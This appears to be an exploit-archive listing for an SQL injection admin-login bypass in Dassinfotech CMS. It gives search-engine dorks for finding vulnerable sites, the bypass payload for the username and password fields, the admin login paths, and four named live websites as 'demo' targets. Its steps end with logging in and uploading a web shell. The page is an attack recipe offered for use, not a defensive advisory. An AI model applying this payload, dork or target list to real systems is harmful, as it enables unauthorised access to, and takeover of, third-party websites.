Dassinfotech CMS SQL Injection Bypass Admin Vulnerability

2020.05.25

Xmall75 (ID)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:Design by Dassinfotech.com

# Exploit Title : Dassinfotech CMS SQL Injection Bypass Admin Vulnerability
# Exploit Author : Xmall75
# Vendor Homepage : www.dassinfotech.com
# Date : 24 / 05 / 2020
# Tested on : Windows 7

# Dork :
intext:Design by Dassinfotech.com
inurl:detailsnews.php?id=

# SQL Injection :
www.target.com/detailsnews.php?id=your payload.

# Payload U / P : '=''or' / '=''or'

# Admin Page :
www.target.com/matri/login.php
www.target.com/india/login.php

# Demo : 
www.vkbpl.in/india/login.php
www.samacharvarta.com/matri2/login.php
www.twodaughtersclub.com/india/login.php
www.patrakarbaba.com/india/login.php

# Step :

- Dorking on the Google.
- Open the admin page.
- Fill the username and password using the payload that i gave.
- Upload your shell.
- Crot.

# xmall75@gmail.com

See this note in RAW Version

Vote for this issue:

66%

34%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Dassinfotech CMS SQL Injection Bypass Admin Vulnerability

Dork: intext:Design by Dassinfotech.com

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.